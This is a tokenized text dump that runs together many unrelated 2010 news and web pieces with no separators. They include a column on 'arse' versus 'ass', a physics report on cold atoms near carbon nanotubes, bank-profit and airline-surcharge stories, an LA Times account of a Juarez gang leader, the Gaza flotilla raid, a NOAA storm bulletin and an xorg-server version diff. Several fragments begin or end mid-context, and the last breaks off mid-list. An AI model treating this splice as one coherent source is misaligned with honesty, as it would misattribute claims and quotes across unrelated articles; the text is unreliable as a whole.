The esteemed editrix of Crikey has asked me to comment on the increased usage of the spelling ‘ ass ’ over ‘ arse ’ in phrases such as “ come back to bite you in the ass ” .
I ’m a confirmed ‘ arse ’ man from way back but I have no intention of pushing this preference onto others .
Diversity is a lovely thing after all .
Having said that , let me explain why I like ‘ arse ’ .
For me it ’s all about the ‘ r ’ .
It leaps off the page with a meaty trill , evoking at once the hairy bum of a commando - kilted highlander and the war cry of a Cornish pirate .
By contrast , ‘ ass ’ packs virtually no punch .
To my mind it bleats in a plaintive falsetto , conjuring nothing more than a pair of sculpted ’ tocks in spandex hot pants , waiting to be drop - kicked by a muddy boot .
The issue is probably more about spelling than language and I would wager that it ’s a uniquely Australian dilemma .
I very much doubt that ‘ ass ’ will be introduced into Britain any more than Americans are likely to adopt ‘ arse ’ .
Why ?
Linguistic jingoism aside , perhaps it has something to do with pronunciation .
To the extent that written English words have at least some relationship to the way they sound , an Australian English ‘ ass ’ will probably sound pretty close to an Australian English ‘ arse ’ .
This is because Australians typically do n’t make use of the so - called post- vocalic ( or after - vowel ) ‘ r ’ , which means that for us the words ‘ balmy ’ and ‘ barmy ’ are pronounced identically .
Contrast this with an American pronouncing ‘ car ’ as ‘ carrgh ’ ( known as the rhotic ‘ r ’ ) or a Scot rolling the ‘r ’ in ‘ person ’ ( known as a trill or tap , depending on its length ) .
But the post - vocalic ‘r ’ is alive and well in the arse ends of Britain , and outside a few r-less enclaves it predominates in the US .
( And that ’s before consideration of the difference in the vowel - sounds associated with each spelling , which I wo n’t go into . )
The a-word , in all its various representations , has a long pedigree .
In about AD 1000 it was written as ‘ ears ’ and the spelling ‘ arses ’ appears by 1480 .
Not until 1860 does the ‘ ass ’ spelling come onto the scene — in England , no less — to denote the bum - crack - like groove on a shoulder block , used by sailors for hauling heavy loads .
If dictionaries are anything to go by it does n’t seem to be the case that the ‘ ass ’ spelling arose through a figurative convergence of ‘ arse ’ ( bum ) and ‘ ass ’ ( donkey ) .
But a convergence in these meanings may be retrospective : in origin , the expression ‘ to make an ass of yourself ’ was to behave like a donkey , ie foolishly .
Today we ’re not so sure .
Google comes up with 2,570,000 for “ an ass of yourself ” but a not insignificant 227,000 hits for “ an arse of yourself ” .
I reckon one of the most interesting new uses of ‘ ass ’ is as a substitute for an object pronoun .
Here ’s just a couple of examples of ‘ my / your ass ’ in US hip hop :
My wandering
Got my ass wondering —
Chuck D , ‘ He got game ’
(‘ My wandering got me wondering ’ )
Cos when she leaves yo ass
She gonna leave with half — Kanye West , ‘ Gold digger ’
( ‘ When she leaves you she is going to leave with half [ of what you own ] ’ )
You could think of the pronominal ass as an example of synecdoche , or a part the stands for a whole .
For example , when you use the expression “ I gave them a hand in unloading the equipment ” it implies that you assisted them with your whole body , not just your hand .
Likewise ‘ my ass ’ stands for me or my whole self , not just the posterior portion .
To a large extent this poetic use of ‘ my ass ’ ( which appeared in print as early as 1958 ) stands in the stead of the standard English ‘ me ’ and ‘ myself ’ , and the same goes for all the - self words : yo ass ( you , yourself ) , his ass ( him , himself ) , they ass ( ‘ them ’ , ‘ themselves ’ ) .
The - elf sense can be reflexive :
Better move yo ass
Outta the path fast — L’il Wyte , ‘ My cutlass ’
( ‘ Move yourself out of the path fast ’ )
But unlike in standard varieties of English it wo n’t work as an adverb or as a means of emphasising somebody ’s role .
You can ’t , for example , say “ I ’ll do it my ass ” ( for “ I ’ll do it myself ” ) nor does it make sense to say “ I my ass have been damaged by this ” ( for “ I myself have been damaged by this ” ) .
So despite my love of ‘ arse ’
I can certainly think of a few scenarios where I would personally opt for ‘ ass ’ , especially if I were consciously making use of a US idiom .
I would never , for example , accuse a sorry - arse mofo of being lame - arse prior to opening a can of whoop - arse .
Likewise , I ’m sure Paul Keating would not have thought to describe Australia as “ the ass end of the world ” .
You can , of course , by - p( ass ) the issue altogether by opting for the good old - fashioned ‘ bum ’ which has the added advantage of being local .
Perhaps one of these days some smart - arse will even try to make it work as a pronoun .
( Visited 4,674 times , 4 visits today )
Image ( c ) 2010 APS , Physical Review Letters , 104 , 133002 ( 2010 ) .
( PhysOrg.com ) --
“ For the first time , fields of study relating both to cold atoms and to the nanoscale have intersected , ” Lene Vestergaard Hau tells PhysOrg.com .
“ Even though both have been active areas of research , cold atoms have not been brought together with nanoscale structures at the single nanometer level .
This is a totally new system . ”
Hau is the Mallinckrodt Professor of Physics and Applied Physics at Harvard University .
Along with colleague J.A. Golovchenko , and graduate students Anne Goodsell and Trygve Ristroph , who are in her lab at Harvard , Hau was able to set up an experiment that allows for the observation of capture and field ionization of cold atoms .
Their work can be found in Physical Review Letters : “ Field Ionization of Cold Atoms near the Wall of a Single Carbon Nanotube . ”
“ What we observed has a number of interesting fundamental and practical implications , ” Hau says .
“ We even compare the effects to those of a black hole . ”
She is quick to point out , though , that the atomic scale black hole effect is not gravitational .
“ It ’s an effect created by an electric field , that creates a singular pull on an atom and ultimately rips it apart .
Those dynamics have similarities to what happens in a black hole . ”
In order to create the effect , Hau and her team grew a single - walled carbon nanotube in their lab .
The nanotube was long — 10 microns — and freely suspended .
The nanotube was also charged up to 300 volts , a highly unusual situation for a nanotube .
Cold atoms were then introduced into the vacuum chamber holding the nanotube .
“ We launched a cold atom cloud toward the nanotube , and because of its charge , atoms were sucked in and captured , ” Hau explains .
Once captured , an atom begins on a spiraling path , orbiting more and more rapidly , until it is ripped apart very close to the nanotube .
The electron is sucked in , and a positive ion is shot off at a high energy .
This ion is detected when it is ejected by the nanotube .
“ When the electron is pulled in , it goes through a tunneling process , ” Hau explains .
“ It has to go through areas that are classically forbidden .
The process is quantum mechanical .
We can observe the interaction of the atom and the nanotube as the electron is trying to tunnel , and this offers us a chance to peek at some of the interesting dynamics that happen at the nanoscale . ”
Another possibility is that this combination of cold atoms with nanoscale structures could lead to new states of matter .
“ Since we now know how to suck atoms into orbit at such high spin rates , it could lead to a new state of cold - atomic matter that could be super interesting to study , ” Hau points out .
Practically , this new system has potential as well .
“ We could make very sensitive detectors , ” Hau says .
“ Things like ‘ atom sniffers ’ that detect trace gases could be an application for this work .
Additionally , the possibility of single nanometer precision means super high spatial resolution .
This system could be used in interferometers — interferometers built on a single chip and based on cold atoms , which would be of importance for navigation , for example . ”
For now , though , Hau and her group are focusing on refining their technique .
“ We want to pursue both the fundamental aspect of creating new cold - matter states , and the development of sensitive detectors .
This is something really new , and it has the potential to be developed into practical applications . ”
More information : Anne Goodsell , et. al. , “ Field Ionization of Cold Atoms near the Wall of a Single Carbon Nanotube , ” Physical Review Letters ( 2010 ) .
Available online : Anne Goodsell , et. al. , “ Field Ionization of Cold Atoms near the Wall of a Single Carbon Nanotube , ” ( 2010 ) .
Available online : link.aps.org/doi/10.1103/PhysRevLett.104.133002
Copyright 2010 PhysOrg.com .
All rights reserved .
This material may not be published , broadcast , rewritten or redistributed in whole or part without the express written permission of PhysOrg.com .
JPMorgan Chase profits jump 55 percent in first quarter of 2010
By Hiram Lee
16 April 2010
US banking giant JPMorgan Chase raked in $ 3.3 billion in profits in the first quarter of 2010 .
This marked a 55 percent increase over the first quarter of 2009 , when the banking firm took in $ 2.1 billion in profits .
Earnings rose from 40 cents per share in 2009 to 74 cents per share this year .
While numerous financial analysts point to the soaring profits of the big banks as evidence that the economy is strengthening , a look at the numbers suggests something different .
Having looted the public treasury with the aid of the Bush and Obama administrations , the banks are returning to profitability through the same parasitic practices which produced the crisis in the first place .
Most of JPMorgan
Chase ’s profits were made trading in mortgage - backed debt securities , with $ 2.4 billion in first quarter revenues .
This is a 54 percent increase from 2009 .
The firm ’s consumer - based businesses , however , have suffered significant losses .
Chase Retail Services , the firm ’s mortgage and retail banking wing , saw a loss of $ 131 million in the first quarter , a steep drop from the $ 474 million in profits it made in the first quarter last year .
Chase Card Services lost $ 303 million .
JPMorgan received $ 25 billion in the federal bailout through the Troubled Asset Relief Program ( TARP ) .
This was essentially “ free money , ” awarded to the banks without restrictions .
While the supposed aim of the TARP bailouts was to facilitate an increase in lending to small businesses and households in order to strengthen the economy , little of this actually occurred .
Lending to households and businesses has continued to drop .
Interest rates on credit cards have risen and home foreclosures have increased .
Instead of using TARP funds to facilitate lending , JPMorgan and other banking firms have increased their profits by returning to predatory and speculative financial maneuvers .
At the same time , the banking executives have also come out in opposition to even the token measures proposed by the Obama administration to regulate their industry .
Feeling themselves in a position of power , with profits on the rise and no significant opposition to their interests in Washington , representatives of JPMorgan Chase and the other banks have begun an aggressive campaign to defend themselves against calls for reform and transparency .
JPMorgan has lobbied against the creation of a consumer protection agency which would monitor common banking practices such as hidden fees , predatory lending , and sudden increases in interest rates on credit cards .
Rejecting a proposal that the banks reduce the loan principals of mortgages for struggling homeowners , JPMorgan Chase ’s Home Lending CEO , David Lowman , speaking this week at a congressional hearing held by the House Financial Services committee , commented : “ In Chase ’s view , such [ broad - based principal reduction ] programs could be potentially very harmful to consumers , investors and future mortgage market conditions and should not be undertaken without first attempting other solutions , including more targeted modification efforts . ”
Testifying along with Lowman against principal reduction programs were representatives of Bank of America , Wells Fargo and Citi Mortgage , Inc .
Among the proposals for reform drawing the most hostile response from the banks has been the “ bank fee , ” proposed by the Obama administration in order to recover a small portion of the bailout funds handed out .
JPMorgan CEO Jamie Dimon said of this relatively minor proposal , “ Let ’s not call it a bank fee , and call it what it is — a punitive bank tax . ”
Such arrogance is not unique to Dimon .
With millions facing unemployment , home foreclosures , the inability to afford basic necessities such as food , heat and light , and the destruction of essential social programs , the billionaire executives of highly profitable banking institutions paint themselves as the victims of a deeply unfair publicity campaign .
The attitude of the bankers was summed up in the April 1 edition of Business Week .
The magazine essentially turned itself into a platform for Goldman Sachs executives to make their case to the public .
The headline and subhead of the story said everything : “ Goldman Sachs : Do n’t Blame Us — When it comes to its role in the financial crisis , Goldman Sachs has a message for the world : Not guilty .
Not one bit . ”
Speaking of the prevailing popular anger against the banks and the widely - held belief that they were responsible for the present economic disaster , David Viniar , Goldman Sachs Chief Financial Officer , told Business Week : “ This has been one of the most frustrating experiences of my 30 years with the firm . ”
Goldman Sachs took in $ 13.4 billion in profits in 2009 .
The persecuted Mr. Viniar earned $ 837,365 in 2009 , and , on top of that , was handed a $ 9 million bonus , along with other top executives .
Authorities think he had his fingertips altered to disguise his prints and plastic surgery to mask his face .
Except for his dark eyes , federal officials doubt he looks anything like his 12 - year - old FBI most wanted photo -- round face , trim mustache and a scar along his cheek .
Eduardo Ravelo , known on the street as “ Tablas , ” or “ lumber , ” for his ability to crush , allegedly rules thousands of acolytes in an operation that authorities say specializes in killing , conspiracy , extortion , drug trafficking and money laundering .
Though he is thought to live across the border in Ciudad Juarez and regularly cross into Texas , he has eluded arrest .
“ He ’s a butterfly , a moth , ” said Samantha Mikeska , an FBI special agent leading the hunt for Ravelo .
“ He takes care of his people and that keeps him under the radar . ”
Advertisement
Ravelo , 42 , is said by law enforcement to have been a major factor in turning Ciudad Juarez into the homicide capital of Mexico , with nearly 5,000 people slain there since 2008 and more than 600 this year .
He is thought to be responsible for dozens of the slayings .
Now he has risen to new prominence as authorities in the U.S. and Mexico investigate whether he was behind the recent drive - by killings of three people associated with the U.S. Consulate in Ciudad Juarez .
Arthur H. Redelfs , a detention officer at the El Paso County Jail , and his wife , Lesley A. Enriquez , a consulate employee , were ambushed and killed March 13 as they drove home from a birthday party .
A third person , who was married to a consulate employee , was apparently killed by mistake as he drove from the same party in a vehicle similar to the Redelfs ’ .
The U.S. is determined to find Ravelo , and his wanted picture is plastered on billboards around El Paso .
But in Mexico , he appears to have protection .
Advertisement
Robert Beltran , a former gang member who runs a private protection firm on both sides of the border , said the Mexican government , with scores of army troops stationed at the border , should be able to catch Ravelo
“ Anybody can be found in Juarez , ” Beltran said .
“ If the government puts enough pressure , or the right price is put out , someone will give him up . ”
But Mikeska , the FBI agent , said Ravelo was no easy target .
“ He is at the highest rank you can get , ” she said .
“ He has a lot of pull , a lot of juice .
He has done a lot to survive . ”
The violence is spilling across the Rio Grande , said Jesse Tovar of the El Paso County Sheriff ’s Office .
Advertisement
He pointed to the killing of Sergio Saucedo , 30 , in September because of a Mexican drug deal , allegedly involving Ravelo , that went bad .
Saucedo was kidnapped from his home in El Paso in front of his family and a school bus filled with children .
His body was dumped on a street in Ciudad Juarez with his arms severed and placed on top of a cardboard sign on his chest .
In El Paso , Ravelo ’s gang is called Barrio Aztecas .
It started small , evolving from the so - called Mexican Mafia of inmates in Texas prisons .
Authorities said its initial aim in the late 1990s was street robberies to collect funds for the prisoners ’ commissary accounts .
Today , authorities say there are 2,000 or more hard - core Barrio Aztecas roaming El Paso , a city of 600,000 beset by drug trafficking and illegal immigrant smuggling .
In Ciudad Juarez , Ravelo ’s gang is known simply as the Aztecas .
Its numbers are difficult to count but are probably three times those in El Paso .
Maybe more .
Both gangs largely work as one outfit , investigators said , primarily moving drugs from the Mexican side into the U.S. Officials said members from both sides , under Ravelo ’s eye , serve as hit men for the larger Juarez cartel and its Vicente Carrillo Fuentes drug trafficking operation that claims this part of the border region as its turf .
Advertisement
Authorities said Ravelo , who was born in Mexico but has permanent resident status in the U.S. , rules the gangs with a firm hand .
They said sicarios , or hired killers , are easy to find ; he pays them less than 500 pesos , or $ 40 , a week .
Gang members who sell heroin for him and then get hooked on the drug are killed .
When drug loads turn up missing in El Paso , suspects are kidnapped and taken to Ciudad Juarez .
Some are shot ; some are tortured and then shot .
Some are beheaded .
But it is not always about drugs .
Authorities think retaliation and intimidation were the motives behind the consulate shootings .
Their operating theory is that Redelfs was the intended target because Ravelo and other gang leaders thought the detention officer was too tough on gang members in the El Paso County Jail .
The violence did not begin with the consulate ambush ; it likely will not end there .
Last week , Azteca members in Ciudad Juarez sent an e-mail to some residents warning them to expect more violence in the next three or four months .
“ People from Juarez , ” the e-mail said , “ get ready because the problem comes hard , the murders are coming heavy and hard .
And do n’t cry with your blankets because nobody cares about you . ”
Advertisement
Authorities said Ravelo assumed leadership after a series of killings along the border eight years ago .
To get to the top , they said , Ravelo betrayed his predecessor , repeatedly stabbing him and then shooting him in the neck .
His ascent was helped , authorities said , by the 2008 arrests in El Paso of six Barrio Azteca leaders , all of whom were handed sentences of life in prison .
Ravelo was indicted with the others in the sweeping federal racketeering case .
In all , 26 gang members were convicted or pleaded guilty , except for Ravelo , who was never caught .
Authorities said he has slipped undetected between Ciudad Juarez and El Paso , sometimes coming with bodyguards and an armored truck to recruit hit men or simply to visit family members on the U.S. side .
For the most part , however , authorities say Ravelo lies low , living modestly with his common - law wife and their children in the Ciudad Juarez hillsides .
Investigators think his base of operations is a tattoo parlor , though they said he rarely frequented the shop now , especially after the consulate shootings .
Advertisement
U.S. authorities have no jurisdiction in Mexico , and must rely on officials there to find and arrest him .
“ He knows he is looking at life in prison with no parole in this country , ” said Mikeska of the FBI .
“ He ’s not a dumb man .
And he ’s not the kind of person who would come in and surrender .
Instead he ’s saying , ‘ Come get me . ’ ”
Carmen Coutino , a Drug Enforcement Administration agent in El Paso , said the agency recently ran a three - day operation with more than 200 federal agents , arresting 54 gang members .
Ravelo ’s gang threatened to retaliate against El Paso police if it continued .
Advertisement
“ The consulate shootings , that ’s one of the reasons we did this , ” Coutino said .
“ There was a lot of intelligence - gathering , a lot of new leads .
We ’re trying to find out what else we do n’t know . ”
richard.serrano@
latimes.com
Prime Minister Benjamin Netanyahu said Monday that he regretted the loss of life sustained by international activists after Israel Navy commandos stormed a flotilla bringing aid to the Gaza Strip , but said the Israeli troops who opened fire were justified for defending themselves .
" They were mobbed , they were clubbed , they were beaten , stabbed , there was even a report of gunfire .
And our soldiers had to defend themselves , " he said .
Open gallery view The Mavi Marmara cruise ship , part of the Gaza aid flotilla .
Credit : Reuters
Netanyahu , who earlier in the day canceled his planned visit to Washington where he was to meet with U.S. President Barack Obama , said that Israel was prepared to bring all humanitarian aid carried on the ship to civilians in Gaza .
" Our policy was and will continue to be that Israel would let humanitarian aid , any kind of goods that are meant for peace , to the civilian population of Gaza , " he said .
" We have no problems with the people of Gaza .
We do have a conflict with the terrorist regime of Hamas , supported by Iran .
We want to maintain a situation where we prevent weapons and war materials from coming into Gaza , and allowing humanitarian aid to go to the population of Gaza . "
Netanyahu was in Ottawa when the incident took place early Monday , and announced that he would return to Israel following his meeting with Canadian President Stephen Harper .
Netanyahu spoke by telephone with Obama prior to his departure to explain why he had decided to cancel their meeting ,
The two planned to coordinate another date for their talks , and Netanyahu promised to keep the U.S. president updated as developments unfolded with regard to the Gaza flotilla incident .
Obama voiced deep regret over the deadly raids , but expressed the importance of " learning all the facts and circumstances " surrounding the incident involving aid ships seeking access to the blockaded Gaza Strip .
He said he understood the prime minister 's decision to return immediately to Israel to deal with today 's events , the statement said .
Israeli officials over the course of Monday defended the Navy 's decision to open fire on the activists during the interception of the boat .
At least nine of the left - wing activists were killed in the incident , and several more wounded .
Seven of the Israeli soldiers were wounded during the clashes , two of them seriously .
Defense Minister Ehud Barak said earlier Monday that the organizers of the Gaza aid flotilla were to blame for the violent events aboard the ship .
In a press conference hours after the incident , Barak said that Israel was prepared to accept the consequences of its actions and would continue to protect its autonomy .
Barak voiced regret for the deaths , but called the flotilla a political provocation and said the sponsors of the flotilla were violent supporters of a terror organization .
Israel Defense Forces Chief of Staff Gabi Ashkenazi , meanwhile , said the soldiers were forced by violent activists to respond with live fire .
Deputy Foreign Minister Danny Ayalon said earlier Monday that the organizers of the Gaza aid flotilla have connections to international terrorist organizations such as Hamas and Al - Qaida , and called the aid convoy a violent and provocative attempt to break the blockade on Gaza .
Ayalon , speaking at a press conference at the Foreign Ministry , said that Israel found weapons aboard the Gaza flotilla , which were used against IDF troops .
The deputy foreign minister said that the Gaza flotilla did not heed Israel 's calls to halt its movement toward Gaza on Monday morning , and stressed that no sovereign country would have allowed such a provocation to take place .
" We could n't allow the opening of a corridor of smuggling arms and terrorists , " said Ayalon .
The deputy foreign minister told reporters that Israel does not want to fight with any country , but that the incident on the Gaza flotilla is not yet over .
Meanwhile , Prime Minister Benjamin Netanyahu canceled his imminent trip to the United States , in wake of the deaths of at least 10 people after Israel Navy troops boarded a flotilla of ships heading to the Gaza Strip carrying aid .
Netanyahu , who was in Ottawa at the time of the incident , had planned to travel to Washington at the invitation of President Barack Obama .
Trade and Industry Minister Benjamin Ben-Eliezer voiced regret Monday morning for deaths aboard the Gaza - bound ships .
" The images are certainly not pleasant .
I can only voice regret at all the fatalities , " Ben-Eliezer told Army Radio .
The comments come as the church is under fire for a sex abuse scandal touching all corners of the globe - and three weeks after Cardinal Tarcisio Bertone , the No. 2 official at the Vatican , said at a news conference in Chile that the sex scandals were linked to homosexuality and not celibacy among priests .
NOAA SEC Space Weather Advisory Bulletin # 10 - 1 : Strong Geomagnetic Storm in Progress
Status Report From : Space Weather Prediction Center ( NOAA )
Posted : Monday , April 5 , 2010
Official Space Weather Advisory issued by NOAA Space Weather Prediction Center
Boulder , Colorado , USA
SPACE WEATHER ADVISORY BULLETIN #10 - 1
2010 April 05 at 12:13 p.m. MST ( 2010 April 05 1213 UTC )
**** STRONG GEOMAGNETIC STORM IN PROGRESS ****
A geomagnetic storm began at 05:55 AM EST Monday , April 5 , 2010 .
Space weather storm levels reached Strong ( G3 ) levels on the Geomagnetic Storms Space Weather Scale .
The source of the storming is an Earth - directed Coronal Mass Ejection associated with a weak solar flare that occurred in Active Region 1059 on April 3 at 05:54 AM EST .
This is expected to be an isolated storm that should subside quickly .
Other than the flare and CME erupting on April 3 , this active region has not produced any significant activity .
Systems that can be affected include electric power systems , spacecraft operations , high - frequency communications , GPS , and other navigation systems .
Data used to provide space weather services are contributed by NOAA , USAF , NASA , NSF , USGS , the International Space Environment Services and other observatories , universities , and institutions .
More information is available at SWPC's Web site http://swpc.noaa.gov
ALERT : Electron 2 MeV Integral Flux exceeded 1,000 pfu
Space Weather Message Code : ALTEF3
Serial Number : 1651
Issue Time : 2010 Apr 05 0949 UTC
ALERT : Electron 2MeV Integral Flux exceeded 1000 pfu
Threshold Reached : 2010 Apr 05 0915 UTC
Station : GOES -11
NOAA Space Weather Scale descriptions can be found at
www.swpc.noaa.gov/NOAAscales
ALERT : Geomagnetic K-index of 7
Space Weather Message Code : ALTK07
Serial Number : 81
Issue Time : 2010 Apr 05 0956 UTC
ALERT : Geomagnetic K-index of 7
Threshold Reached : 2010 Apr 05 0955 UTC
Synoptic Period : 0900 - 1200 UTC
Station : Boulder
Active Warning : No
NOAA Scale : G3 - Strong
NOAA Space Weather Scale descriptions can be found at
www.swpc.noaa.gov/NOAAscales
// end //
More status reports and news releases or top stories .
Please follow SpaceRef on Twitter and Like us on Facebook .
Please enable JavaScript to view the comments powered by Disqus .
Note : Most of the games at GameScene.com require either the Shockwave Player or the Flash Player .
The Shockwave player was discontinued in April , 2019 .
If you still have it installed , these games may still work .
The Flash Player will be available until the end of 2020 , but only for some browsers .
Then it will be retired by Adobe .
With Shockwave game and Flash soon to follow , the games at this site will soon be retired .
Many of these game are now available as iPhone and iPad apps
New nerve cells - even in old age
Max Planck researchers find different types of stem cells in the brains of mature and old mice
After birth the brain looses many nerve cells and this continues throughout life - most neurons are formed before birth , after which many excess neurons degenerate .
However , there are some cells that are still capable of division in old age - in the brains of mice , at least .
According to scientists from the Max Planck Institute of Immunobiology in Freiburg , different types of neuronal stem cells exist that can create new neurons .
While they divide continuously and create new neurons in young animals , a large proportion of the cells in older animals persist in a state of dormancy .
However , the production of new cells can be reactivated , for example , through physical activity or epileptic seizures .
What happens in mice could also be applicable to humans as neurons that are capable of dividing also occur in the human brain into adulthood .
( Cell Stem Cell , May 7th 2010 )
In the brains of mice different types of neuronal stem cells exist that can create new neurons .
While they divide continuously and create new neurons in young animals , a large proportion of the cells in older animals persist in a state of dormancy .
However , the production of new cells can be reactivated , for example , through physical activity or epileptic seizures .
© Verdon Taylor ( from : Lugert et al. , Cell Stem Cell , May 7th , 2010 )
In the brains of mice different types of neuronal stem cells exist that can create new neurons .
While they divide continuously and create new neurons in young animals , a large proportion of the cells in older animals persist in a state of dormancy .
However , the production of new cells can be reactivated , for example , through physical activity or epileptic seizures .
© Verdon Taylor ( from : Lugert et al. , Cell Stem Cell , May 7th , 2010 )
You ca n’t teach an old dog new tricks .
The corresponding view that the brain loses learning and memory capacity with advancing age prevailed for a long time .
However , neuronal stem cells exist in the hippocampus - a region of the brain that plays a central role in learning and memory functions - that can produce new nerve cells throughout life .
It is known from tests on mice that the newly formed cells are integrated into the existing networks and play an important role in the learning capacity of animals .
Nonetheless , the formation of new cells declines with age and the reasons for this were unknown up to now .
Together with colleagues from Dresden and Munich , the Freiburg researchers have now succeeded in explaining for the first time why fewer new neurons are formed in the adult mouse brain .
They managed to identify different populations of neuronal stem cells , thereby demonstrating that the hippocampus has active and dormant or inactive neuronal stem cells .
" In young mice , the stem cells divide four times more frequently than in older animals .
However , the number of cells in older animals is only slightly lower .
Therefore , neuronal stem cells do not disappear with age but are kept in reserve , " explains Verdon Taylor from the Max Planck Institute of Immunobiology .
The precise factors that influence the reactivation of dormant stem cells are not yet clear .
The cells can , however , be stimulated to divide again .
The scientists observed more newborn hippocampal neurons in physically active mice than in their inactive counterparts .
" Consequently , running promotes the formation of new neurons , " says Verdon Taylor .
Pathological brain activity , for example that which occurs during epileptic seizures , also triggers the division of the neuronal stem cells .
Horizontal and radial stem cells
The different stem cell populations are easy to distinguish under the microscope .
The first group comprises cells which lie perpendicular to the surface of the hippocampus .
Most of these radial stem cells are dormant .
As opposed to this , over 80 % of the cells in the group of horizontal stem cells - cells whose orientation runs parallel to the hippocampus surface - continuously form new cells ; the remaining 20 % are dormant but sporadically become activated .
The activity of genes such as Notch , RBP - J and Sox2 is common to all of the cells .
Radial and horizontal stem cells differ not only in their arrangement , apparently they also react to different stimuli .
When the animals are physically active , some radial stem cells abandon their dormant state and begin to divide , while this has little influence on the horizontal stem cells .
The result is that more radial stem cells divide in active mice .
The horizontal stem cells , in contrast , are also influenced by epileptic seizures .
It would appear that neuronal stem cells are not only found in the brains of mice .
The presence of neurons that are formed over the course of life has also been demonstrated in the human hippocamus .
Therefore , scientists suspect that different types of active and inactive stem cells also arise in the human brain .
It is possible that inactive stem cells in humans can also be activated in a similar way to inactive stem cells in mice .
" There are indicators that the excessive formation of new neurons plays a role in epilepsy .
The use of neuronal brain stem cells in the treatment of brain injuries or degenerative diseases like Alzheimers may also be possible one day , " hopes Verdon Taylor .
From the April 11th Nickelback concert from Scotiabank Place in Ottawa , ON :
Yes , it ’s real .
[ Link ]
He refused to give in to Russian demands for limits on missile defense and came away with an arms control treaty that , while modest , sets the stage for better relations .
He got into high - profile scraps with the leaders of Israel and Afghanistan .
And now he faces a critical test of whether he can forge a coalition to impose new sanctions on Iran .
Mr. Obama in recent days has backed down in his clash with President Hamid Karzai of Afghanistan .
But during his news conference closing the nuclear meeting on Tuesday , he seemed to signal a renewed determination to reinsert himself into the Israeli - Palestinian dispute .
By describing the long - running conflict as a threat to American security , he effectively adopted the argument of Gen. David H. Petraeus , his Middle East commander , who recently warned that the region ’s troubles created a dangerous environment for American troops stationed in nearby Iraq and elsewhere in the area .
“ It is a vital national security interest of the United States to reduce these conflicts because whether we like it or not , we remain a dominant military superpower , ” he said .
“ And when conflicts break out , one way or another , we get pulled into them .
And that ends up costing us significantly in terms of both blood and treasure . ”
For most new presidents , foreign policy is a learning experience , and it can take months , if not years , to feel comfortable in the role of world leader .
Advisers said Mr. Obama , like his predecessors , had grown more confident in managing international relations over time .
But he has learned hard lessons along the way about the limits of his powers of persuasion .
He has acknowledged that he underestimated , for instance , just how hard it would be to bring Israelis and Palestinians together , and his engagement with Iran yielded no more cooperation than Mr. Bush ’s approach .
Malcolm McLaren , the former manager of punk group the Sex Pistols , dies this morning in New York , his agent tells the BBC .
McLaren was 64 .
McLaren , the ex-partner of designer Vivienne Westwood , was believed to have been diagnosed with cancer a while ago , reports the BBC .
McLaren and Westwood had a son , Joseph Corre , the co-founder of lingerie shop Agent Provocateur .
index 5b5f6616c..591d2b445 100644
--- a/
+++ b/ diff -- git a/configure.ac b/configure.acindex 5b5f6616c..591d2b445 100644--- a/ configure.ac +++ b/ configure.ac @@ - 26,8 +26,8 @@ dnl dnl Process this file with autoconf to create configure .
AC_PREREQ ( 2.57 ) - AC_INIT ( [ xorg - server ] , 1.7.99.902 , [ https://bugs.freedesktop.org/enter_bug.cgi?product=xorg], xorg - server ) - RELEASE_DATE =" 2010-03 -21 " + AC_INIT ( [ xorg - server ] , 1.8.0 , [ https://bugs.freedesktop.org/enter_bug.cgi?product=xorg], xorg - server ) +RELEASE_DATE=" 2010-04-02 " AC_CONFIG_SRCDIR([ Makefile.am ] )
AM_INIT_AUTOMAKE ( [ foreign dist- bzip2 ] ) AM_MAINTAINER_MODE
WASHINGTON ( Reuters ) - U.S. industry executives from the wind , solar , hydropower , geothermal and biomass sectors pushed on Tuesday for a federal renewable energy standard , which they said would foster growth and create jobs .
This could also spur these industries at a time when China is moving swiftly into this area , said Denise Bode , CEO of the American Wind Energy Association .
Some 30 countries -- including China and the European Union countries -- and 29 U.S. states already have the hard targets mandated by a renewable energy standard , Bode said in a telephone news briefing .
While 2009 was generally a year of expansion for renewable U.S. energy firms , Bode said one “ game changer ” was China ’s leap into the lead , ahead of former leader Germany , as the world ’s biggest builder of wind turbines and also in the amount of new generating capacity added last year .
“ The Chinese activity really lends an urgency to helping Congress and the administration to act on a renewable energy standard , ” she said .
Renewable energy standards , also known as renewable portfolio standards , require that a certain percentage of total energy needs be generated from renewable sources ; President Barack Obama has urged that a national U.S. standard require 25 percent renewable power by 2025 .
Obama also supports legislation to curb greenhouse gas emissions -- such as those from fossil - fueled power plants -- that contribute to climate change , but such a measure stalled in the Senate last year .
Executives from the National Hydropower Association , the Biomass Power Association , the Geothermal Energy Association and the Solar Energy Industries Association called for strong short - and long - term targets for a renewable energy standard .
They also called for continuation of tax incentives and praised continuing support for renewable energy in the administration ’s economic stimulus package .
In the biomass sector , Robert Cleaves , CEO of the biomass group , said thousands of jobs could be lost if Congress fails to extend a production tax credit that expired late last year .
For companies in the solar power sector , association president Rhone Resch said 2009 was a banner year .
Resch said the outlook for 2010 was even sunnier , with most analysts seeing growth of 100 percent or more for the industry .
All of the executives stressed the ability of their industries to create U.S. jobs , not just in manufacturing but also in installation , which by their nature cannot be outsourced .
( CNN ) -- Summer vacation just got more expensive , as the five largest U.S. airlines introduced " peak air travel surcharges " virtually every day while school is out for much of the country .
American , Continental , Delta , United and US Airways are adding $ 10 to $ 30 on top of published fares every day ( except July 4 ) from June 10 to August 22 .
( July 4 is an extremely slow day for travel , experts say . )
" I think it was to be expected , " said Gabe Saglie , senior editor at Travelzoo.com .
" I think the airline industry , for months now , has been looking at summer 2010 as the light at the end of the tunnel , counting on people finally loosening the belt a little bit ... after a good year and a half of belt - tightening or curtailing or even eliminating vacationing . "
Even discount airline AirTran is getting in on the act , though its surcharge is a flat $ 10 and applies to only 25 days in that date range , according to data published by Farecompare.com .
Other discount airlines have resisted the trend .
The surcharge is figured into the final price that travelers are quoted , not listed separately like the notorious baggage fees that have become common across most of the commercial airline industry .
" It 's part of what I consider to be rather clever marketing , " Saglie said .
" Pushing a very low fare is one thing , [ but ] by the time you 've paid for your ticket and arrived at your destination , it 's a very different picture .
" Between point A and point B , you 're checking bags at a fee , you 're buying sodas at a fee , you 're getting an aisle seat vs. a middle seat at a fee , and so the surcharge is just joining this family of fees that airlines are using to supplement these fares that are lower than they 've been in a long time , " he said .
Airlines benefit from raising prices via surcharges because one filing changes thousands of airfares , which means they do n't have to pay the filing fees for raising each route 's fare individually , Farecompare CEO Rick Seaney wrote on his blog .
Consumers should focus on what they can do to keep their costs down , Orbitz spokeswoman Jeanenne Tornatore said .
She suggested travelers do the following :
• Book early to take advantage of advance - booking discounts and to get the best fare dates .
